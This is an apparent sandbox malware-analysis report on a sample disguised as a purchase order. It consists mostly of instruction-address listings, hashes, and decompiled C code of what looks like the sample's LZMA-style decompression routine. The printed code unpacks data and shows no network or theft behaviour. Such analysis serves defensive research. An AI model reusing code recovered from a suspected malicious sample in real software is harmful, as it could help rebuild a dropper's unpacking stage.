							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                      0x00405ead
                      0x00405eb4
                      0x00405eba
                      0x00405ec0
                      0x00000000
                      0x00405ec4
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405ee6
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efb
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f46
                      0x00405f49
                      0x00405f71
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4b
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f63
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fba
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fbf
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fdc
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406022
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066ca
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406700
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406709
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x00406728
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x004060bc
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x004060e5
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x00000000
                      0x00406856
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406104
                      0x00406107
                      0x0040610a
                      0x0040610a
                      0x0040610d
                      0x00406110
                      0x00000000
                      0x00000000
                      0x00406116
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x0040614d
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406180
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406189
                      0x00406190
                      0x00406193
                      0x00000000
                      0x00406199
                      0x00000000
                      0x00406199
                      0x00000000
                      0x0040619e
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c3
                      0x004061c3
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e6
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406211
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x00406216
                      0x0040621d
                      0x00406220
                      0x00000000
                      0x00406222
                      0x00000000
                      0x00406222
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00406227
                      0x00000000
                      0x00000000
                      0x00406262
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00406287
                      0x00406287
                      0x0040628d
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00000000
                      0x0040622e
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062aa
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d5
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062da
                      0x004062e1
                      0x004062e4
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x004062e6
                      0x00000000
                      0x00406573
                      0x00406573
                      0x00406577
                      0x0040689e
                      0x00000000
                      0x0040689e
                      0x0040657d
                      0x00406580
                      0x00406583
                      0x00406587
                      0x0040658a
                      0x00406590
                      0x00406592
                      0x00406592
                      0x00406592
                      0x00406595
                      0x00000000
                      0x00000000
                      0x00406343
                      0x00406343
                      0x00406346
                      0x00000000
                      0x00000000
                      0x00406682
                      0x00406686
                      0x004066a8
                      0x004066ab
                      0x004066b5
                      0x004066b8
                      0x004066b8
                      0x00000000
                      0x004066b8
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406692
                      0x00406695
                      0x00000000
                      0x00000000
                      0x0040673f
                      0x00406743
                      0x00406761
                      0x00406761
                      0x00406761
                      0x00406768
                      0x0040676f
                      0x00406776
                      0x00406776
                      0x00000000
                      0x00406776
                      0x00406745
                      0x00406748
                      0x0040674b
                      0x0040674e
                      0x00406755
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00000000
                      0x00000000
                      0x00406830
                      0x00406833
                      0x00000000
                      0x00000000
                      0x0040646a
                      0x0040646c
                      0x00406473
                      0x00406474
                      0x00406476
                      0x00406479
                      0x00000000
                      0x00000000
                      0x00406481
                      0x00406484
                      0x00406487
                      0x00406489
                      0x0040648b
                      0x0040648b
                      0x0040648c
                      0x0040648f
                      0x00406496
                      0x00406499
                      0x004064a7
                      0x00000000
                      0x00000000
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x00000000
                      0x00000000
                      0x0040678c
                      0x0040678c
                      0x00406790
                      0x004068c8
                      0x00000000
                      0x004068c8
                      0x00406796
                      0x00406799
                      0x0040679c
                      0x004067a0
                      0x004067a3
                      0x004067a9
                      0x004067ab
                      0x004067ab
                      0x004067ab
                      0x004067ae
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b1
                      0x004067b4
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00406734
                      0x004067ba
                      0x004067c0
                      0x004067c3
                      0x004067c6
                      0x004067c9
                      0x004067cc
                      0x004067cf
                      0x004067d2
                      0x004067d5
                      0x004067d8
                      0x004067db
                      0x004067f4
                      0x004067f7
                      0x004067fa
                      0x004067fd
                      0x00406801
                      0x00406803
                      0x00406803
                      0x00406804
                      0x00406807
                      0x004067dd
                      0x004067dd
                      0x004067e5
                      0x004067ea
                      0x004067ec
                      0x004067ef
                      0x004067ef
                      0x0040680a
                      0x00406811
                      0x00000000
                      0x00406813
                      0x00000000
                      0x00406813
                      0x00000000
                      0x004064af
                      0x004064b2
                      0x004064e8
                      0x00406618
                      0x00406618
                      0x00406618
                      0x00406618
                      0x0040661b
                      0x0040661b
                      0x0040661e
                      0x00406620
                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                      • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
